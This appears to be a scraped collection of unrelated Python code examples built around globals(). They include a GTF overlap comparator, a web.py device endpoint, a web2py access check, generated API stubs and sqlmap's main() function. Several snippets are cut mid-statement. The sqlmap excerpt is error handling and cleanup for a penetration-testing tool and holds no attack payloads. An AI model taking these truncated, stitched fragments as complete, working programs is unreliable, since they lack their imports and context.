                first_entry1.strand != entry1.strand) and \
                (first_entry2.contig != entry2.contig or
                 first_entry2.strand != entry2.strand) and \
                    entry1.contig == entry2.contig and \
                    entry1.strand == entry2.strand:

                subtotals.append(
                    (first_entry1.contig, first_entry1.strand, subtotal))
                subtotal = Counts(add_percent=options.add_percent)
                first_entry1 = entry1
                first_entry2 = entry2

        else:
            first_entry1 = entry1
            first_entry2 = entry2

        output_1, output_2 = None, None

        if GTF.Overlap(entry1, entry2):

            # collect multiple matches
            last_l = True
            while GTF.Overlap(entry1, entry2):

                if overlapping_genes is not None:
                    overlapping_genes.append((entry1.gene_id, entry2.gene_id))

                write_last = True
                subtotal.noverlap += 1
                if entry1.start == entry2.start and entry1.end == entry2.end:
                    symbol = "="
                    subtotal.nidentical += 1
                elif entry1.start == entry2.start or entry1.end == entry2.end:
                    symbol = "|"
                    subtotal.nhalf += 1
                else:
                    symbol = "~"

                output_1 = entry1
                output_2 = entry2

                if entry1.end < entry2.end:
                    i1 += 1
                    subtotal.nleft += 1
                    last_l = True

                    if i1 >= n1:
                        i2 += 1
                        break

                    entry1 = gff1[i1]
                    if GTF.Overlap(entry1, entry2):
                        symbol = "/"
                        # outfile.write( "# split right\n" )
                        subtotal.nsplit_right += 1

                else:
                    i2 += 1
                    subtotal.nright += 1
                    last_l = False

                    if i2 >= n2:
                        i1 += 1
                        break

                    entry2 = gff2[i2]
                    if GTF.Overlap(entry1, entry2):
                        symbol = "\\"
                        # outfile.write("# split left\n")
                        subtotal.nsplit_left += 1

                # output at the end, so that symbol is known
                if options.write_equivalent:
                    if options.format == "flat":
                        outfile_overlap.write(
                            "%s\t%s\t%s\n" % (symbol, str(output_1), str(output_2)))
                    elif options.format == "multi-line":
                        outfile_overlap.write(
                            "%s\t%s\n\t%s\n" % (symbol, str(output_1), str(output_2)))

                write_last = False

            if write_last and output_1 and output_2 and options.write_equivalent:
                if options.format == "flat":
                    outfile_overlap.write(
                        "%s\t%s\t%s\n" % (symbol, str(output_1), str(output_2)))
                elif options.format == "multi-line":
                    outfile_overlap.write(
                        "%s\t%s\n\t%s\n" % (symbol, str(output_1), str(output_2)))

            # if last advance was left, go right, and vice versa
            if last_l:
                i2 += 1
                subtotal.nright += 1
            else:
                i1 += 1
                subtotal.nleft += 1

        elif _cmp(entry1, entry2) < 0:
            outfile_diff.write("<\t%s\n" % str(entry1))
            subtotal.nunique_left += 1
            i1 += 1
            subtotal.nleft += 1

        elif _cmp(entry1, entry2) > 0:
            outfile_diff.write(">\t%s\n" % str(entry2))
            subtotal.nunique_right += 1
            i2 += 1
            subtotal.nright += 1

    while i1 < n1:
        outfile_diff.write("<\t%s\n" % str(entry1))
        subtotal.nunique_left += 1
        i1 += 1
        if i1 >= n1:
            break
        entry1 = gff1[i1]
        subtotal.nleft += 1

    while i2 < n2:
        outfile_diff.write(">\t%s\n" % str(entry2))
        subtotal.nunique_right += 1
        i2 += 1
        if i2 >= n2:
            break
        entry2 = gff2[i2]
        subtotal.nright += 1

    subtotals.append((entry1.contig, entry1.strand, subtotal))

    if outfile_diff != options.stdout:
        outfile_diff.close()
    if outfile_overlap != options.stdout:
        outfile_overlap.close()

    ##################################################################
    ##################################################################
    ##################################################################
    # print gene based information
    ##################################################################
    if overlapping_genes:
        outfile = getFile(options, "genes_ovl")
        s = set(overlapping_genes)
        outfile.write("gene_id1\tgene_id2\n")
        for a, b in s:
            outfile.write("%s\t%s\n" % (a, b))
        if outfile != options.stdout:
            outfile.close()

        outfile_total = getFile(options, "genes_total")
        outfile_total.write(
            "set\tngenes\tnoverlapping\tpoverlapping\tnunique\tpunique\n")

        outfile = getFile(options, "genes_uniq1")
        a = set([x.gene_id for x in gff1])
        b = set([x[0] for x in s])
        d = a.difference(b)
        outfile.write("gene_id1\n")
        outfile.write("\n".join(d) + "\n")
        if outfile != options.stdout:
            outfile.close()
        outfile_total.write("%s\t%i\t%i\t%5.2f\t%i\t%5.2f\n" % (
            os.path.basename(input_filename1), len(
                a), len(b), 100.0 * len(b) / len(a),
            len(d), 100.0 * len(d) / len(a)))

        outfile = getFile(options, "genes_uniq2")
        a = set([x.gene_id for x in gff2])
        b = set([x[1] for x in s])
        d = a.difference(b)
        outfile.write("gene_id2\n")
        outfile.write("\n".join(d) + "\n")
        if outfile != options.stdout:
            outfile.close()

        outfile_total.write("%s\t%i\t%i\t%5.2f\t%i\t%5.2f\n" % (
            os.path.basename(input_filename2), len(
                a), len(b), 100.0 * len(b) / len(a),
            len(d), 100.0 * len(d) / len(a)))
        if outfile_total != options.stdout:
            outfile_total.close()

    ##################################################################
    ##################################################################
    ##################################################################
    # print totals
    ##################################################################
    outfile = getFile(options, "total")
    outfile.write("chr\tstrand\t%s\n" %
                  Counts(add_percent=options.add_percent).getHeader())

    total = Counts(add_percent=options.add_percent)
    for x in subtotals:
        outfile.write("\t".join((x[0], x[1], str(x[2]))) + "\n")
        total += x[2]

    outfile.write("\t".join(("all", "all", str(total))) + "\n")

    if outfile != options.stdout:
        outfile.close()

    E.Stop()
Пример #43
0
import web
import ardustat_library_no_class as ard
import socket

# Route table: requests to '/' are handled by the `generic` class below.
urls = (
	'/','generic'	
)


# web.py application; handler class names are resolved via this module's globals.
app = web.application(urls, globals())

class generic:
	"""web.py handler for '/' that returns a fresh reading from the ardustat."""

	def GET(self):
		"""Connect to the ardustat, blink its LED, and return the parsed reading.

		Returns whatever ``ard.parsedread()`` produces, served as text/html.
		"""
		web.header('Content-Type', 'text/html; charset=utf-8', unique=True)
		try:
			ard.connect(7777)
		except Exception:
			# Fix: the original bare `except:` also swallowed SystemExit and
			# KeyboardInterrupt and bound an unused `foo` variable. A failed
			# connect is tolerated here (the device may already be connected);
			# a real fault will surface in the calls below.
			pass
		ard.blink()
		return ard.parsedread()
		

# Run the built-in web.py development server when executed directly.
if __name__ == "__main__": app.run()
# Driver script: the library-settings module named by --libSetFile is imported
# dynamically and its public attributes are promoted into globals() below, so
# names like `samplelist` and `UTRfilestring` appear unbound in this fragment.
# NOTE(review): `argparse`, `sys` and `importlib` must be imported earlier in
# this file (not visible here) -- confirm.
parser= argparse.ArgumentParser()
parser.add_argument('--rootDir', help= 'the root directory containing data and scripts')
parser.add_argument('--libSetFile', help = 'libset file')
parser.add_argument('--threadNumb', help= 'number of threads')
args = parser.parse_args()
sys.path.append("%s/riboseq" % args.rootDir)
sys.path.append("%s/riboseq/libsettings" % args.rootDir)
import rphelper as rph

rootDir = args.rootDir
libsetName = args.libSetFile
libset = importlib.import_module("%s" % libsetName)
# Promote every public attribute of the libset module into this script's
# global namespace (e.g. samplelist, UTRfilestring used below).
for attr in dir(libset):
	if not attr.startswith("_"):
		globals()[attr] = getattr(libset, attr)
threadNumb = str(args.threadNumb)


# NOTE(review): hard-coded selection of samples 18 and 20 from the libset's
# samplelist -- presumably a deliberate subset for this run; confirm.
samplelist = [samplelist[18]]+[samplelist[20]]

### set inputs here:

# Inset distances trimming region boundaries; the zero-inset variant is active.
defaultInsets = { 'utr5Inset3' : 6, 'cdsInset5' : 18, 'cdsInset3' : 15, 'utr3Inset5' : 6 }
zeroInsets    = { 'utr5Inset3' : 0, 'cdsInset5' : 0, 'cdsInset3' : 0, 'utr3Inset5' : 0 }
# insets= defaultInsets
insets= zeroInsets


# NOTE(review): mode "rU" is removed in Python 3.11 (use "r"); the file handle
# is also never closed -- consider a `with` block.
UTRdict = rph.readindict(open(UTRfilestring, "rU"))
Пример #45
0
async def entry_point(module, session):
    """Dispatch to the module-level coroutine matching the requested state.

    Looks up a function named ``_<state>`` (where ``state`` comes from
    ``module.params["state"]``) in this module's globals and awaits it with
    the module parameters and the session.
    """
    state = module.params["state"]
    handler = globals()["_" + state]
    return await handler(module.params, session)
Пример #46
0
import copy
import datetime
import os
import socket

from gluon._compat import iteritems
import gluon.contenttype
import gluon.fileutils


# NOTE(review): `request` is injected by the web2py execution environment
# rather than imported -- this file is executed, not imported, by web2py.
is_gae = request.env.web2py_runtime_gae or False

# ## critical --- make a copy of the environment

# Snapshot the current globals so later code can run against a stable
# environment; re-expose `datetime` explicitly inside that snapshot.
global_env = copy.copy(globals())
global_env['datetime'] = datetime

http_host = request.env.http_host.split(':')[0]
remote_addr = request.env.remote_addr
try:
    # Addresses considered "local" for the access check performed below.
    hosts = (http_host, socket.gethostname(),
             socket.gethostbyname(http_host),
             '::1', '127.0.0.1', '::ffff:127.0.0.1')
except:
    # NOTE(review): bare except looks like a deliberate best-effort fallback
    # when hostname/DNS resolution fails; narrowing to socket.error would be
    # safer -- confirm before changing.
    hosts = (http_host, )

if request.is_https:
    session.secure()
elif (remote_addr not in hosts) and (remote_addr != "127.0.0.1") and \
    (request.function != 'manage'):
Пример #47
0
def main():
    """
    Main function of sqlmap when running from command line.

    Parses command-line options, initializes the environment, then either
    runs one of the self-test modes or starts the scanning controller.
    Failures are translated into user-facing messages, and the process
    exit status is recorded in ``os._exitcode``.
    """

    try:
        dirtyPatches()
        resolveCrossReferences()
        checkEnvironment()
        setPaths(modulePath())
        banner()

        # Store original command line options for possible later restoration
        args = cmdLineParser()
        cmdLineOptions.update(
            args.__dict__ if hasattr(args, "__dict__") else args)
        initOptions(cmdLineOptions)

        if checkPipedInput():
            conf.batch = True

        if conf.get("api"):
            # heavy imports
            from lib.utils.api import StdDbOut
            from lib.utils.api import setRestAPILog

            # Overwrite system standard output and standard error to write
            # to an IPC database
            sys.stdout = StdDbOut(conf.taskid, messagetype="stdout")
            sys.stderr = StdDbOut(conf.taskid, messagetype="stderr")
            setRestAPILog()

        conf.showTime = True
        dataToStdout("[!] legal disclaimer: %s\n\n" % LEGAL_DISCLAIMER,
                     forceOutput=True)
        dataToStdout("[*] starting @ %s\n\n" % time.strftime("%X /%Y-%m-%d/"),
                     forceOutput=True)

        init()

        if not conf.updateAll:
            # Postponed imports (faster start)
            if conf.smokeTest:
                from lib.core.testing import smokeTest
                os._exitcode = 1 - (smokeTest() or 0)
            elif conf.vulnTest:
                from lib.core.testing import vulnTest
                os._exitcode = 1 - (vulnTest() or 0)
            elif conf.fuzzTest:
                from lib.core.testing import fuzzTest
                fuzzTest()
            else:
                from lib.controller.controller import start
                if conf.profile:
                    from lib.core.profiling import profile
                    # Expose `start` at module level so the profiler can
                    # locate it by name.
                    globals()["start"] = start
                    profile()
                else:
                    try:
                        if conf.crawlDepth and conf.bulkFile:
                            targets = getFileItems(conf.bulkFile)

                            for i in xrange(len(targets)):
                                target = None

                                try:
                                    kb.targets.clear()
                                    target = targets[i]

                                    if not re.search(r"(?i)\Ahttp[s]*://",
                                                     target):
                                        target = "http://%s" % target

                                    infoMsg = "starting crawler for target URL '%s' (%d/%d)" % (
                                        target, i + 1, len(targets))
                                    logger.info(infoMsg)

                                    crawl(target)
                                except Exception as ex:
                                    if target and not isinstance(
                                            ex, SqlmapUserQuitException):
                                        errMsg = "problem occurred while crawling '%s' ('%s')" % (
                                            target, getSafeExString(ex))
                                        logger.error(errMsg)
                                    else:
                                        raise
                                else:
                                    if kb.targets:
                                        start()
                        else:
                            start()
                    except Exception as ex:
                        os._exitcode = 1

                        if "can't start new thread" in getSafeExString(ex):
                            errMsg = "unable to start new threads. Please check OS (u)limits"
                            logger.critical(errMsg)
                            raise SystemExit
                        else:
                            raise

    except SqlmapUserQuitException:
        if not conf.batch:
            errMsg = "user quit"
            logger.error(errMsg)

    except (SqlmapSilentQuitException, bdb.BdbQuit):
        pass

    except SqlmapShellQuitException:
        cmdLineOptions.sqlmapShell = False

    except SqlmapBaseException as ex:
        errMsg = getSafeExString(ex)
        logger.critical(errMsg)

        os._exitcode = 1

        raise SystemExit

    except KeyboardInterrupt:
        print()

    except EOFError:
        print()

        errMsg = "exit"
        logger.error(errMsg)

    except SystemExit as ex:
        os._exitcode = ex.code or 0

    except:
        # Catch-all triage: inspect the formatted traceback for known failure
        # signatures and translate each into an actionable message before
        # exiting (or, failing that, report/mask the unhandled exception).
        print()
        errMsg = unhandledExceptionMessage()
        excMsg = traceback.format_exc()
        valid = checkIntegrity()

        os._exitcode = 255

        if any(_ in excMsg for _ in ("MemoryError", "Cannot allocate memory")):
            errMsg = "memory exhaustion detected"
            logger.critical(errMsg)
            raise SystemExit

        elif any(_ in excMsg for _ in ("No space left", "Disk quota exceeded",
                                       "Disk full while accessing")):
            errMsg = "no space left on output device"
            logger.critical(errMsg)
            raise SystemExit

        elif any(_ in excMsg for _ in ("The paging file is too small", )):
            errMsg = "no space left for paging file"
            logger.critical(errMsg)
            raise SystemExit

        elif all(_ in excMsg
                 for _ in ("Access is denied", "subprocess", "metasploit")):
            errMsg = "permission error occurred while running Metasploit"
            logger.critical(errMsg)
            raise SystemExit

        elif all(_ in excMsg for _ in ("Permission denied", "metasploit")):
            errMsg = "permission error occurred while using Metasploit"
            logger.critical(errMsg)
            raise SystemExit

        elif "Read-only file system" in excMsg:
            errMsg = "output device is mounted as read-only"
            logger.critical(errMsg)
            raise SystemExit

        elif "Insufficient system resources" in excMsg:
            errMsg = "resource exhaustion detected"
            logger.critical(errMsg)
            raise SystemExit

        elif "OperationalError: disk I/O error" in excMsg:
            errMsg = "I/O error on output device"
            logger.critical(errMsg)
            raise SystemExit

        elif "Violation of BIDI" in excMsg:
            errMsg = "invalid URL (violation of Bidi IDNA rule - RFC 5893)"
            logger.critical(errMsg)
            raise SystemExit

        elif "Invalid IPv6 URL" in excMsg:
            errMsg = "invalid URL ('%s')" % excMsg.strip().split('\n')[-1]
            logger.critical(errMsg)
            raise SystemExit

        elif "_mkstemp_inner" in excMsg:
            errMsg = "there has been a problem while accessing temporary files"
            logger.critical(errMsg)
            raise SystemExit

        elif any(_ in excMsg for _ in ("tempfile.mkdtemp", "tempfile.mkstemp",
                                       "tempfile.py")):
            errMsg = "unable to write to the temporary directory '%s'. " % tempfile.gettempdir(
            )
            errMsg += "Please make sure that your disk is not full and "
            errMsg += "that you have sufficient write permissions to "
            errMsg += "create temporary files and/or directories"
            logger.critical(errMsg)
            raise SystemExit

        elif "Permission denied: '" in excMsg:
            match = re.search(r"Permission denied: '([^']*)", excMsg)
            errMsg = "permission error occurred while accessing file '%s'" % match.group(
                1)
            logger.critical(errMsg)
            raise SystemExit

        elif all(_ in excMsg for _ in ("twophase", "sqlalchemy")):
            errMsg = "please update the 'sqlalchemy' package (>= 1.1.11) "
            errMsg += "(Reference: 'https://qiita.com/tkprof/items/7d7b2d00df9c5f16fffe')"
            logger.critical(errMsg)
            raise SystemExit

        elif all(_ in excMsg for _ in ("scramble_caching_sha2", "TypeError")):
            errMsg = "please downgrade the 'PyMySQL' package (=< 0.8.1) "
            errMsg += "(Reference: 'https://github.com/PyMySQL/PyMySQL/issues/700')"
            logger.critical(errMsg)
            raise SystemExit

        elif "must be pinned buffer, not bytearray" in excMsg:
            errMsg = "error occurred at Python interpreter which "
            errMsg += "is fixed in 2.7. Please update accordingly "
            errMsg += "(Reference: 'https://bugs.python.org/issue8104')"
            logger.critical(errMsg)
            raise SystemExit

        elif all(_ in excMsg for _ in ("Resource temporarily unavailable",
                                       "os.fork()", "dictionaryAttack")):
            errMsg = "there has been a problem while running the multiprocessing hash cracking. "
            errMsg += "Please rerun with option '--threads=1'"
            logger.critical(errMsg)
            raise SystemExit

        elif "can't start new thread" in excMsg:
            errMsg = "there has been a problem while creating new thread instance. "
            errMsg += "Please make sure that you are not running too many processes"
            if not IS_WIN:
                errMsg += " (or increase the 'ulimit -u' value)"
            logger.critical(errMsg)
            raise SystemExit

        elif "can't allocate read lock" in excMsg:
            errMsg = "there has been a problem in regular socket operation "
            errMsg += "('%s')" % excMsg.strip().split('\n')[-1]
            logger.critical(errMsg)
            raise SystemExit

        elif all(_ in excMsg for _ in ("pymysql", "configparser")):
            errMsg = "wrong initialization of pymsql detected (using Python3 dependencies)"
            logger.critical(errMsg)
            raise SystemExit

        elif all(_ in excMsg
                 for _ in ("ntlm", "socket.error, err", "SyntaxError")):
            errMsg = "wrong initialization of python-ntlm detected (using Python2 syntax)"
            logger.critical(errMsg)
            raise SystemExit

        elif all(_ in excMsg for _ in ("drda", "to_bytes")):
            errMsg = "wrong initialization of drda detected (using Python3 syntax)"
            logger.critical(errMsg)
            raise SystemExit

        elif "'WebSocket' object has no attribute 'status'" in excMsg:
            errMsg = "wrong websocket library detected"
            errMsg += " (Reference: 'https://github.com/sqlmapproject/sqlmap/issues/4572#issuecomment-775041086')"
            logger.critical(errMsg)
            raise SystemExit

        elif all(_ in excMsg for _ in ("window = tkinter.Tk()", )):
            errMsg = "there has been a problem in initialization of GUI interface "
            errMsg += "('%s')" % excMsg.strip().split('\n')[-1]
            logger.critical(errMsg)
            raise SystemExit

        elif any(_ in excMsg for _ in ("unable to access item 'liveTest'", )):
            errMsg = "detected usage of files from different versions of sqlmap"
            logger.critical(errMsg)
            raise SystemExit

        elif kb.get("dumpKeyboardInterrupt"):
            raise SystemExit

        elif any(_ in excMsg for _ in ("Broken pipe", )):
            raise SystemExit

        elif valid is False:
            errMsg = "code integrity check failed (turning off automatic issue creation). "
            errMsg += "You should retrieve the latest development version from official GitHub "
            errMsg += "repository at '%s'" % GIT_PAGE
            logger.critical(errMsg)
            print()
            dataToStdout(excMsg)
            raise SystemExit

        elif any(_ in excMsg for _ in ("tamper/", "waf/")):
            logger.critical(errMsg)
            print()
            dataToStdout(excMsg)
            raise SystemExit

        elif any(_ in excMsg
                 for _ in ("ImportError", "ModuleNotFoundError",
                           "Can't find file for module",
                           "SAXReaderNotAvailable",
                           "source code string cannot contain null bytes",
                           "No module named", "tp_name field")):
            errMsg = "invalid runtime environment ('%s')" % excMsg.split(
                "Error: ")[-1].strip()
            logger.critical(errMsg)
            raise SystemExit

        elif all(_ in excMsg
                 for _ in ("SyntaxError: Non-ASCII character", ".py on line",
                           "but no encoding declared")):
            errMsg = "invalid runtime environment ('%s')" % excMsg.split(
                "Error: ")[-1].strip()
            logger.critical(errMsg)
            raise SystemExit

        elif all(_ in excMsg for _ in ("No such file", "_'")):
            errMsg = "corrupted installation detected ('%s'). " % excMsg.strip(
            ).split('\n')[-1]
            errMsg += "You should retrieve the latest development version from official GitHub "
            errMsg += "repository at '%s'" % GIT_PAGE
            logger.critical(errMsg)
            raise SystemExit

        elif all(_ in excMsg for _ in ("No such file", "sqlmap.conf", "Test")):
            errMsg = "you are trying to run (hidden) development tests inside the production environment"
            logger.critical(errMsg)
            raise SystemExit

        elif all(_ in excMsg
                 for _ in ("HTTPNtlmAuthHandler",
                           "'str' object has no attribute 'decode'")):
            errMsg = "package 'python-ntlm' has a known compatibility issue with the "
            errMsg += "Python 3 (Reference: 'https://github.com/mullender/python-ntlm/pull/61')"
            logger.critical(errMsg)
            raise SystemExit

        # NOTE(review): the second operand checks `errMsg` (the generic
        # unhandled-exception message), not `excMsg` -- presumably
        # intentional upstream; verify against the sqlmap repository.
        elif "'DictObject' object has no attribute '" in excMsg and all(
                _ in errMsg for _ in ("(fingerprinted)", "(identified)")):
            errMsg = "there has been a problem in enumeration. "
            errMsg += "Because of a considerable chance of false-positive case "
            errMsg += "you are advised to rerun with switch '--flush-session'"
            logger.critical(errMsg)
            raise SystemExit

        elif "bad marshal data (unknown type code)" in excMsg:
            match = re.search(r"\s*(.+)\s+ValueError", excMsg)
            errMsg = "one of your .pyc files are corrupted%s" % (
                " ('%s')" % match.group(1) if match else "")
            errMsg += ". Please delete .pyc files on your system to fix the problem"
            logger.critical(errMsg)
            raise SystemExit

        # Normalize file paths inside the traceback to short, relative,
        # forward-slash form before reporting.
        for match in re.finditer(r'File "(.+?)", line', excMsg):
            file_ = match.group(1)
            try:
                file_ = os.path.relpath(file_, os.path.dirname(__file__))
            except ValueError:
                pass
            file_ = file_.replace("\\", '/')
            if "../" in file_:
                file_ = re.sub(r"(\.\./)+", '/', file_)
            else:
                file_ = file_.lstrip('/')
            file_ = re.sub(r"/{2,}", '/', file_)
            excMsg = excMsg.replace(match.group(1), file_)

        errMsg = maskSensitiveData(errMsg)
        excMsg = maskSensitiveData(excMsg)

        if conf.get("api") or not valid:
            logger.critical("%s\n%s" % (errMsg, excMsg))
        else:
            logger.critical(errMsg)
            dataToStdout("%s\n" %
                         setColor(excMsg.strip(), level=logging.CRITICAL))
            createGithubIssue(errMsg, excMsg)

    finally:
        kb.threadContinue = False

        if getDaysFromLastUpdate() > LAST_UPDATE_NAGGING_DAYS:
            warnMsg = "your sqlmap version is outdated"
            # NOTE(review): logger.warn is deprecated in favor of
            # logger.warning in the Python logging module.
            logger.warn(warnMsg)

        if conf.get("showTime"):
            dataToStdout("\n[*] ending @ %s\n\n" %
                         time.strftime("%X /%Y-%m-%d/"),
                         forceOutput=True)

        kb.threadException = True

        # Remove temporary IPC/testing/cookie/big-array files, then the
        # whole temp directory if only junk remains.
        if kb.get("tempDir"):
            for prefix in (MKSTEMP_PREFIX.IPC, MKSTEMP_PREFIX.TESTING,
                           MKSTEMP_PREFIX.COOKIE_JAR,
                           MKSTEMP_PREFIX.BIG_ARRAY):
                for filepath in glob.glob(
                        os.path.join(kb.tempDir, "%s*" % prefix)):
                    try:
                        os.remove(filepath)
                    except OSError:
                        pass

            if not filterNone(
                    filepath
                    for filepath in glob.glob(os.path.join(kb.tempDir, '*'))
                    if not any(
                        filepath.endswith(_)
                        for _ in (".lock", ".exe", ".so",
                                  '_'))):  # ignore junk files
                try:
                    shutil.rmtree(kb.tempDir, ignore_errors=True)
                except OSError:
                    pass

        if conf.get("hashDB"):
            conf.hashDB.flush(True)

        if conf.get("harFile"):
            try:
                with openFile(conf.harFile, "w+b") as f:
                    json.dump(conf.httpCollector.obtain(),
                              fp=f,
                              indent=4,
                              separators=(',', ': '))
            except SqlmapBaseException as ex:
                errMsg = getSafeExString(ex)
                logger.critical(errMsg)

        if conf.get("api"):
            conf.databaseCursor.disconnect()

        if conf.get("dumper"):
            conf.dumper.flush()

        # short delay for thread finalization
        _ = time.time()
        while threading.activeCount() > 1 and (
                time.time() - _) > THREAD_FINALIZATION_TIMEOUT:
            time.sleep(0.01)

        # Restart interactively when running inside the sqlmap shell.
        if cmdLineOptions.get("sqlmapShell"):
            cmdLineOptions.clear()
            conf.clear()
            kb.clear()
            conf.disableBanner = True
            main()
Пример #48
0
def get_info(name):
    """Return the global named *name*, else ``<name>_info``, else ``{}``."""
    table = globals()
    fallback = table.get(name + "_info", {})
    return table.get(name, fallback)
Пример #49
0
 # We load into globals whatever we have in extension_module
 # We specifically exclude any modules that may be included (like sys, os, etc)
 # *except* for ones that are part of metaflow_custom (basically providing
 # an aliasing mechanism)
 # NOTE(review): `_ext_plugins`, `types` and `sys` are bound outside this
 # fragment; the one-space indentation suggests this runs inside an enclosing
 # block whose header is not visible here -- confirm before relocating.
 lazy_load_custom_modules = {}
 addl_modules = _ext_plugins.__dict__.get('__mf_promote_submodules__')
 if addl_modules:
     # We make an alias for these modules which the metaflow_custom author
     # wants to expose but that may not be loaded yet
     lazy_load_custom_modules = {
         'metaflow.plugins.%s' % k: 'metaflow_custom.plugins.%s' % k
         for k in addl_modules
     }
 # Promote plain attributes into globals; collect metaflow_custom submodules
 # for lazy aliasing instead of promoting them directly.
 for n, o in _ext_plugins.__dict__.items():
     if not n.startswith('__') and not isinstance(o, types.ModuleType):
         globals()[n] = o
     elif isinstance(o, types.ModuleType) and o.__package__ and \
             o.__package__.startswith('metaflow_custom'):
         lazy_load_custom_modules['metaflow.plugins.%s' % n] = o
 if lazy_load_custom_modules:
     # NOTE: We load things first to have metaflow_custom override things here.
     # This does mean that for modules that have the same name (for example,
     # if metaflow_custom.plugins also provides a conda module), it needs
     # to provide whatever is expected below (so for example a `conda_step_decorator`
     # file with a `CondaStepDecorator` class).
     # We do this because we want metaflow_custom to fully override things
     # and if we did not change sys.meta_path here, the lines below would
     # load the non metaflow_custom modules providing for possible confusion.
     # This keeps it cleaner.
     from metaflow import _LazyLoader
     sys.meta_path = [_LazyLoader(lazy_load_custom_modules)] + sys.meta_path
Пример #50
0
# Iterate over moduli e = 2, 3, ...; for each, grow the crystal level by level,
# printing idempotents, crystal nodes and the reduced Cartan matrix.
# Relies on Partition, evaluate_inducts, compute_reduced_cartan_matrix,
# print_matrix and compute_crystal defined elsewhere in this file.
e = 2
while True:
    print("At modulus %s." % e)
    previous_idempotents = [((), Partition(()))]
    level = 0
    cartan_matrix = []
    # Keep inducing until the reduced Cartan matrix exceeds 50 rows.
    while len(cartan_matrix) <= 50:
        print("At level %s for mod %s." % (level, e))
        for i, (idemp, part) in enumerate(previous_idempotents):
            print("w_%s: %s" % (i, idemp))
            sys.stdout.flush()
        for i, (idemp, part) in enumerate(previous_idempotents):
            print("w_%s crystal node: %s" % (i, part.parts))
            sys.stdout.flush()
        for i, (idemp, part) in enumerate(previous_idempotents):
            print("e_{w_%s}(\emptyset) = %s" % (i, evaluate_inducts(idemp, e)))
            sys.stdout.flush()
        cartan_matrix = compute_reduced_cartan_matrix(
            map(lambda pair: pair[0], previous_idempotents), e)
        print("Reduced (Crystal) Cartan matrix:")
        #print("["+",\n ".join(map(str, cartan_matrix)) + "]")
        print_matrix(cartan_matrix)
        sys.stdout.flush()
        previous_idempotents = compute_crystal(e, previous_idempotents)
        level += 1
    e += 1

# NOTE(review): the outer `while True` above never terminates, so this guard
# is unreachable when the script is run directly.
if __name__ == '__main__':
    import code
    code.interact(local=globals())
Пример #51
0
def lazy_import():
    """Import IamAccountRelationship on first use and publish it module-wide.

    The import is deferred into this function -- presumably to break an
    import cycle among the generated intersight model modules (verify);
    after the first call the class is resolvable by name at module level.
    """
    from intersight.model.iam_account_relationship import IamAccountRelationship
    globals()['IamAccountRelationship'] = IamAccountRelationship
Пример #52
0
    from lib.core.option import initOptions
    from lib.core.patch import dirtyPatches
    from lib.core.patch import resolveCrossReferences
    from lib.core.settings import GIT_PAGE
    from lib.core.settings import IS_WIN
    from lib.core.settings import LAST_UPDATE_NAGGING_DAYS
    from lib.core.settings import LEGAL_DISCLAIMER
    from lib.core.settings import THREAD_FINALIZATION_TIMEOUT
    from lib.core.settings import UNICODE_ENCODING
    from lib.core.settings import VERSION
    from lib.parse.cmdline import cmdLineParser
    from lib.utils.crawler import crawl
except KeyboardInterrupt:
    errMsg = "user aborted"

    if "logger" in globals():
        logger.critical(errMsg)
        raise SystemExit
    else:
        import time
        sys.exit("\r[%s] [CRITICAL] %s" % (time.strftime("%X"), errMsg))


def modulePath():
    """
    This will get us the program's directory, even if we are frozen
    using py2exe
    """

    try:
        _ = sys.executable if weAreFrozen() else __file__
Пример #53
0
    The version of the OpenAPI document: 0.5.0-master.56
    Generated by: https://openapi-generator.tech
"""


import sys
import unittest

import madana_apiclient
from madana_apiclient.model.json_enclave_port import JsonEnclavePort
from madana_apiclient.model.json_environment import JsonEnvironment
from madana_apiclient.model.json_kubernetes_enclave import JsonKubernetesEnclave
from madana_apiclient.model.json_process import JsonProcess
from madana_apiclient.model.json_wireguard_interface import JsonWireguardInterface
# Generated scaffolding: register the referenced model classes in module
# globals -- presumably so the client's deserializer can resolve these types
# by name; verify against the openapi-generator runtime.
globals()['JsonEnclavePort'] = JsonEnclavePort
globals()['JsonEnvironment'] = JsonEnvironment
globals()['JsonKubernetesEnclave'] = JsonKubernetesEnclave
globals()['JsonProcess'] = JsonProcess
globals()['JsonWireguardInterface'] = JsonWireguardInterface
from madana_apiclient.model.json_enclave_process import JsonEnclaveProcess


class TestJsonEnclaveProcess(unittest.TestCase):
    """Unit test stubs for the JsonEnclaveProcess model."""

    def setUp(self):
        """No per-test fixtures are required for these stubs."""

    def tearDown(self):
        """Nothing to clean up."""
Пример #54
0
def invoke(name, *args, **kwargs):
    """Look up *name* in this module's globals and call it with the given
    arguments.

    Returns the call's result, or None when no truthy global of that name
    exists.
    """
    target = globals().get(name)
    if not target:
        return None
    return target(*args, **kwargs)
Пример #55
0
        intersection = tf.reduce_sum(tf.cast(intersection_mask, tf.float32), axis=1)
        union = tf.reduce_sum(tf.cast(union_mask, tf.float32), axis=1)

        iou = tf.where(union == 0, 1., intersection / union)
        return super().update_state(iou, sample_weight)

if __name__ == "__main__":
    # Parse arguments
    parser = argparse.ArgumentParser()
    parser.add_argument("predictions", type=str, help="Path to predicted output.")
    parser.add_argument("dataset", type=str, help="Which dataset to evaluate ('dev', 'test').")
    parser.add_argument("--seed", default=42, type=int, help="Random seed.")
    parser.add_argument("--threads", default=1, type=int, help="Maximum number of threads to use.")
    parser.add_argument("--verbose", default=False, action="store_true", help="Verbose TF logging.")
    args = parser.parse_args([] if "__file__" not in globals() else None)

    # Fix random seeds and threads
    np.random.seed(args.seed)
    tf.random.set_seed(args.seed)
    tf.config.threading.set_inter_op_parallelism_threads(args.threads)
    tf.config.threading.set_intra_op_parallelism_threads(args.threads)

    # Report only errors by default
    if not args.verbose:
        os.environ["TF_CPP_MIN_LOG_LEVEL"] = "3"

    # Load the gold data
    gold_masks = getattr(CAGS(), args.dataset).map(CAGS.parse).map(lambda example: example["mask"])

    # Create the metric
Пример #56
0
                writer.writerow([did, 'all', cid])

        # 學分學程、跨域學程、其他課程
        for type_name, type in [('學分學程', program), ('跨領域學程', cross),
                                ('其他課程', others)]:
            category_map[type_name] = OrderedDict()
            for dep_name, dep in type.items():
                graduateds.append(dep_name)
                did = graduateds.index(dep_name)
                category_map[type_name][dep_name] = did
                writer.writerows([[did, 'all', cid] for cid in dep])

        # 教育學程
        graduateds.append('教育學程')
        did = graduateds.index('教育學程')
        category_map['教育學程'] = did
        writer.writerows([[did, 'all', cid] for cid in education['教育學程']])

    # with open('graduateds.csv', 'w', newline='')as csvfile:
    #     writer = csv.writer(csvfile, delimiter=',')
    #     writer.writerows(list(enumerate(graduateds)))

    with open(os.path.join(root, 'category_map.json'), 'w',
